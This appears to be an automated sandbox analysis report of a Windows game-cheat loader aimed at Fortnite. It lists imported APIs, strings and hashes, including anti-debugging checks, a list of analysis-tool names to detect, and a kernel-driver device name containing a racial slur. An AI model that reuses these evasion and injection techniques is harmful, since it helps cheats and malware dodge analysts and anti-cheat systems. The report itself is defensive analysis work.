CloseHandle.KERNEL32 ref: 00007FF68B4C6093
DeviceIoControl.KERNEL32 ref: 00007FF68B4C60F4
MessageBoxA.USER32 ref: 00007FF68B4C6121
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C6129
CloseHandle.KERNEL32 ref: 00007FF68B4C6130
_beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C61A8
_Thrd_detach.MSVCP140 ref: 00007FF68B4C61E1
_beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C6261
_Thrd_detach.MSVCP140 ref: 00007FF68B4C629A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF68B4C62D0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4C62E0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF68B4C6303
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4C6313
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF68B4C6336
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4C6346
LoadIconA.USER32 ref: 00007FF68B4C637A
LoadCursorA.USER32 ref: 00007FF68B4C638E
LoadIconA.USER32 ref: 00007FF68B4C63BB
GetDesktopWindow.USER32 ref: 00007FF68B4C63C8
GetWindowRect.USER32 ref: 00007FF68B4C63D8
RegisterClassExA.USER32 ref: 00007FF68B4C63E5
CreateWindowExA.USER32 ref: 00007FF68B4C6440
SetWindowLongA.USER32 ref: 00007FF68B4C645B
DwmExtendFrameIntoClientArea.DWMAPI ref: 00007FF68B4C647F
ShowWindow.USER32 ref: 00007FF68B4C6491
SetWindowPos.USER32 ref: 00007FF68B4C64BD
SetLayeredWindowAttributes.USER32 ref: 00007FF68B4C64D5
UpdateWindow.USER32 ref: 00007FF68B4C64E2
?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF68B4C6561
?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF68B4C6574
?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF68B4C6580
?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF68B4C6593

Strings

Load Dependencies (Close Game First), xrefs: 00007FF68B4C4304
cls, xrefs: 00007FF68B4C4B91, 00007FF68B4C6019
Driver Found, xrefs: 00007FF68B4C4E91, 00007FF68B4C56F1
Your choice: , xrefs: 00007FF68B4C4AA1
WinVer, xrefs: 00007FF68B4C6434
The driver could not get the base address..., xrefs: 00007FF68B4C611A
Inject Orqur, xrefs: 00007FF68B4C46D1
VAText -> , xrefs: 00007FF68B4C62E6
\\.\orqur-ontop-fucking-nigger, xrefs: 00007FF68B4C4BBE, 00007FF68B4C5406
cr3 -> , xrefs: 00007FF68B4C6319
Waiting For Fortnite, xrefs: 00007FF68B4C5B91
FortniteClient-Win64-Shipping.exe, xrefs: 00007FF68B4C6060
Fortnite, xrefs: 00007FF68B4C63A6
Base Address -> , xrefs: 00007FF68B4C62B3
Driver Error Contact Support., xrefs: 00007FF68B4C50FF, 00007FF68B4C5425

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@$V01@@$system$Window$Create$Cpp_error@std@@LoadThrow_$HandlePerformanceQueryThreadV01@_$AddressCloseCounterCurrentDebuggerFileIconMessagePresentProcProcess32ProtectThrd_detachVirtual_beginthreadexexit$??5?$basic_istream@AreaAttributesCheckClassClientControlCursorDesktopDeviceExtendFirstFrameFrequencyInformationIntoLayeredLibraryLongModuleNextProcessRandom_device@std@@RectRegisterRemoteShowSleepSnapshotToolhelp32Update_invalid_parameter_noinfo_noreturnlstrcmpi
String ID: Driver Found$ Inject Orqur$ Load Dependencies (Close Game First)$ Waiting For Fortnite$ Your choice: $Base Address -> $Driver Error Contact Support.$Fortnite$FortniteClient-Win64-Shipping.exe$The driver could not get the base address...$VAText -> $WinVer$\\.\orqur-ontop-fucking-nigger$cls$cr3 ->
API String ID: 199387910-4207893356
Opcode ID: 6afdbcf87a3b67085b1b6566a440aee1ec517a3b6d9f6c1b7e69540980585ce6
Instruction ID: 148c47e62b66924d2e1d406669d473214f6734edac88b376481504cb83c49511
Opcode Fuzzy Hash: 6afdbcf87a3b67085b1b6566a440aee1ec517a3b6d9f6c1b7e69540980585ce6
Instruction Fuzzy Hash: F413F826D25BC289F7139B3594132E4A350AFAB7C4F40D336E95476A6BEF39B285C304

Function 00007FF68B4B4BD0 Relevance: 119.0, APIs: 63, Strings: 4, Instructions: 1722threadlibrarymemoryCOMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00007FF68B4B4BFF
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B4E7F
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B4E8A
GetCurrentProcess.KERNEL32 ref: 00007FF68B4B4E97
CheckRemoteDebuggerPresent.KERNELBASE ref: 00007FF68B4B4EA5
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B513F
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B514A
LoadLibraryA.KERNEL32 ref: 00007FF68B4B5160
GetProcAddress.KERNEL32 ref: 00007FF68B4B5170
GetCurrentProcess.KERNEL32 ref: 00007FF68B4B5179
NtQueryInformationProcess.NTDLL ref: 00007FF68B4B5194
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B542F
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B543A
memset.VCRUNTIME140 ref: 00007FF68B4B544E
GetCurrentThread.KERNEL32 ref: 00007FF68B4B545A
GetThreadContext.KERNEL32 ref: 00007FF68B4B5468
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B5632
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B563D
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B57E2
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B57ED
GetCurrentProcess.KERNEL32 ref: 00007FF68B4B57F4
OpenProcessToken.ADVAPI32 ref: 00007FF68B4B5807
GetTokenInformation.KERNELBASE ref: 00007FF68B4B582B
CloseHandle.KERNELBASE ref: 00007FF68B4B585E
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B5A02
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B5A0D
CloseHandle.KERNEL32 ref: 00007FF68B4B5A19
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B5BB2
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B5BBD
VirtualAlloc.KERNELBASE ref: 00007FF68B4B5BD4
memset.VCRUNTIME140 ref: 00007FF68B4B5BF0
VirtualFree.KERNELBASE ref: 00007FF68B4B5C21
SetLastError.KERNEL32 ref: 00007FF68B4B5C29
GetLastError.KERNEL32 ref: 00007FF68B4B5C36
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B5DE2
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B5DED
VirtualFree.KERNEL32 ref: 00007FF68B4B5DFF
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B5FA2
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B5FAD
CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF68B4B5FC3
Thread32First.KERNEL32 ref: 00007FF68B4B5FE6
GetCurrentProcessId.KERNEL32 ref: 00007FF68B4B5FF0
GetCurrentThreadId.KERNEL32 ref: 00007FF68B4B5FFC
OpenThread.KERNEL32 ref: 00007FF68B4B6013
LoadLibraryA.KERNEL32 ref: 00007FF68B4B6028
GetProcAddress.KERNEL32 ref: 00007FF68B4B6038
NtSetInformationThread.NTDLL ref: 00007FF68B4B6051
CloseHandle.KERNELBASE ref: 00007FF68B4B6056
Thread32Next.KERNEL32 ref: 00007FF68B4B6064
CloseHandle.KERNELBASE ref: 00007FF68B4B6071
GetTickCount.KERNEL32 ref: 00007FF68B4B6077
GetTickCount.KERNEL32 ref: 00007FF68B4B60A6
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B6253
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B625E
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B64FF
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B650A
GetProcessHeap.KERNEL32 ref: 00007FF68B4B6511
HeapSetInformation.KERNEL32 ref: 00007FF68B4B6525
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B66D2
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B66DD
VirtualAlloc.KERNELBASE ref: 00007FF68B4B66F7
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B68A3
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B68AE

Strings

NtQueryInformationProcess, xrefs: 00007FF68B4B5169
0000000000000000, xrefs: 00007FF68B4B4F13, 00007FF68B4B520B, 00007FF68B4B62DD
NtSetInformationThread, xrefs: 00007FF68B4B6031
ntdll.dll, xrefs: 00007FF68B4B5151, 00007FF68B4B6021

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@exit$Process$Current$Thread$CloseHandleInformationVirtual$AddressAllocCountDebuggerErrorFreeHeapLastLibraryLoadOpenPresentProcThread32TickTokenmemset$CheckContextCreateFirstNextQueryRemoteSnapshotToolhelp32
String ID: 0000000000000000$NtQueryInformationProcess$NtSetInformationThread$ntdll.dll
API String ID: 3073719868-2087985706
Opcode ID: de9bff0a8e818de36f9d9748c275109a1bba248353a6a13a8705fb6a0d04ead7
Instruction ID: e2a368b86e11e5dcbcd09f88930f4c19cb422c85537b4af4b982445486708b66
Opcode Fuzzy Hash: de9bff0a8e818de36f9d9748c275109a1bba248353a6a13a8705fb6a0d04ead7
Instruction Fuzzy Hash: 1EF2F926D29B9386F703973598130A8E354BFAB680B50D33BFE5477A65FF29B1858304

Function 00007FF68B4B4760 Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 241
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF68B4B478C
GetProcAddress.KERNEL32 ref: 00007FF68B4B479C
VirtualProtect.KERNELBASE ref: 00007FF68B4B47B8
VirtualProtect.KERNELBASE ref: 00007FF68B4B47D9

Part of subcall function 00007FF68B4B4220: ?_Random_device@std@@YAIXZ.MSVCP140 ref: 00007FF68B4B423F

LoadLibraryA.KERNEL32 ref: 00007FF68B4B47EB
GetProcAddress.KERNEL32 ref: 00007FF68B4B47FB
GetCurrentThread.KERNEL32 ref: 00007FF68B4B4809
NtSetInformationThread.NTDLL ref: 00007FF68B4B481D
QueryPerformanceFrequency.KERNEL32 ref: 00007FF68B4B4824
QueryPerformanceCounter.KERNEL32 ref: 00007FF68B4B482F
QueryPerformanceCounter.KERNEL32 ref: 00007FF68B4B485A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B4B6F
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B4B7A

Strings

kernel32.dll, xrefs: 00007FF68B4B4781
NtSetInformationThread, xrefs: 00007FF68B4B47F4
IsDebuggerPresent, xrefs: 00007FF68B4B4795
ntdll.dll, xrefs: 00007FF68B4B47E4

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: PerformanceQuery$AddressCounterProcProtectThreadV01@Virtual$??6?$basic_ostream@CurrentD@std@@@std@@FrequencyHandleInformationLibraryLoadModuleRandom_device@std@@U?$char_traits@V01@@exit
String ID: IsDebuggerPresent$NtSetInformationThread$kernel32.dll$ntdll.dll
API String ID: 995830000-2640589995
Opcode ID: adf374b0e8421fad87755e922a66f96c4bdbfe7214f3300a5803e6311160309a
Instruction ID: 5a38b1dcd4a424e7fa1b5db330ea995c71ff0630ce6c8216b886dc38b11f822b
Opcode Fuzzy Hash: adf374b0e8421fad87755e922a66f96c4bdbfe7214f3300a5803e6311160309a
Instruction Fuzzy Hash: B7B1F326D29B8286F7039735A813165E360BFAB780F50D336FA5473A66EF2DF1858704

Function 00007FF68B4B4300 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF68B4BE8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE8F8

Part of subcall function 00007FF68B4BE8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE998

Part of subcall function 00007FF68B4BE8C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4BE9B6

Part of subcall function 00007FF68B4BE8C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE975

FindWindowA.USER32 ref: 00007FF68B4B44BF
FindWindowA.USER32 ref: 00007FF68B4B45F5

Strings

IDAVW32, xrefs: 00007FF68B4B4576
WinDbgFrameClass, xrefs: 00007FF68B4B4527
x64dbg.exe, xrefs: 00007FF68B4B4376
ida64.exe, xrefs: 00007FF68B4B43C2
immunitydebugger.exe, xrefs: 00007FF68B4B43E8
windbg.exe, xrefs: 00007FF68B4B4437
IDAVW64, xrefs: 00007FF68B4B454F
ghidra.exe, xrefs: 00007FF68B4B440E
ida.exe, xrefs: 00007FF68B4B439C
ollydbg.exe, xrefs: 00007FF68B4B4350
OLLYDBG, xrefs: 00007FF68B4B44FE

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: FindWindowmemcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: IDAVW32$IDAVW64$OLLYDBG$WinDbgFrameClass$ghidra.exe$ida.exe$ida64.exe$immunitydebugger.exe$ollydbg.exe$windbg.exe$x64dbg.exe
API String ID: 3370411492-2758119655
Opcode ID: 1d9e69b401927d88b9fca741bb07f01ba78ba68ae319a56e903c9ea4fa3ef6b6
Instruction ID: a5b516697937221029798aa28c9f1bc0700846aa0c67cf3478619681df783211
Opcode Fuzzy Hash: 1d9e69b401927d88b9fca741bb07f01ba78ba68ae319a56e903c9ea4fa3ef6b6
Instruction Fuzzy Hash: AA917322E54BC585E710CB75D8422F96361FF9E784F50673AEA8D93A69DF78E284C300

Function 00007FF68B4CA2A0 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 278
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4CA338
__std_fs_code_page.MSVCPRT ref: 00007FF68B4CA393
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4CA3F7
ShellExecuteW.SHELL32 ref: 00007FF68B4CA53A
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4CA5C8
__std_fs_code_page.MSVCPRT ref: 00007FF68B4CA61E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4CA682
ShellExecuteW.SHELL32 ref: 00007FF68B4CA7A9

Strings

me.e, xrefs: 00007FF68B4CA5EF
ysme, xrefs: 00007FF68B4CA5E8
h\ph, xrefs: 00007FF68B4CA5E1

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: ExecuteShell__std_fs_code_page_invalid_parameter_noinfo_noreturnsystem
String ID: h\ph$me.e$ysme
API String ID: 2996404153-506599315
Opcode ID: 402041abf3d57c2e9f9853a71c2590334672f65a2095b9b116e3a0899d59e04f
Instruction ID: 51f9c8300dce8191f2385855e5f3eed4b5c1840fb5d5e5999aa5df05f879efa0
Opcode Fuzzy Hash: 402041abf3d57c2e9f9853a71c2590334672f65a2095b9b116e3a0899d59e04f
Instruction Fuzzy Hash: B0E1AE72E28781CAF301CFB4E0422AD7771FF59748F505229EE896BAA9DF789149C740

Function 00007FF68B4B4660 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF68B4B469D
K32EnumProcessModules.KERNEL32 ref: 00007FF68B4B46B6
GetCurrentProcess.KERNEL32 ref: 00007FF68B4B46D5
K32GetModuleBaseNameA.KERNEL32 ref: 00007FF68B4B46EF
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF68B4B470B

Strings

dbgcore.dll, xrefs: 00007FF68B4B4691
dbghelp.dll, xrefs: 00007FF68B4B4685

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: Process$Current$BaseEnumModuleModulesName_stricmp
String ID: dbgcore.dll$dbghelp.dll
API String ID: 3352702578-4118436743
Opcode ID: 39409bc3aaebe3b29eb61088f4b17b1d3cca093d82c753ba441b24beb8647698
Instruction ID: 747fb9c13f57cc5a5b9924811237ce7af9719b1069c88fee3f25d314c3b8c117
Opcode Fuzzy Hash: 39409bc3aaebe3b29eb61088f4b17b1d3cca093d82c753ba441b24beb8647698
Instruction Fuzzy Hash: AB213232A18A82C5EB609B51F4562AA73A0FF8DB84F44013ADA9D8377DDF3CE549C700

Function 00007FF68B4CB0D0 Relevance: 12.1, APIs: 8, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF68B4CB0F9
__scrt_release_startup_lock.LIBCMT ref: 00007FF68B4CB167
_register_thread_local_exe_atexit_callback.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4CB1B5
_get_initial_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4CB1BA
__p___argv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4CB1C2
__p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4CB1CA
_cexit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4CB1EC
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4CB246

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
String ID:
API String ID: 1133592946-0
Opcode ID: 29dd0aa1747a757d2d6cf578fca60c9522578ce549b093b6a4cd5ef780515681
Instruction ID: 0925ff970ed1ff149d1787f30f977a4c147287aa1d2c01a6a52d3de23991dab8
Opcode Fuzzy Hash: 29dd0aa1747a757d2d6cf578fca60c9522578ce549b093b6a4cd5ef780515681
Instruction Fuzzy Hash: 1E31FB11A08A4AC1EA14AB2594373B92391BF4DF84F44503CEA4DC72BFDE7CAA0DC751

Function 00007FF68B4C87A0 Relevance: 10.6, APIs: 7, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF68B4B2731), ref: 00007FF68B4C8807
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF68B4B2731), ref: 00007FF68B4C8874
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF68B4B2731), ref: 00007FF68B4C889D
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF68B4B2731), ref: 00007FF68B4C88CF
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF68B4B2731), ref: 00007FF68B4C8913
?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF68B4B2731), ref: 00007FF68B4C891A
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF68B4B2731), ref: 00007FF68B4C8927

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
String ID:
API String ID: 3395113616-0
Opcode ID: c9bcc7db87e2d8c628c8dffa5ca9983a5de8c2b7fd5a8934495827476f989654
Instruction ID: a772841dddac66ef0970ebcbe0c14da26f3bd6e92d632967d94751b29c145c11
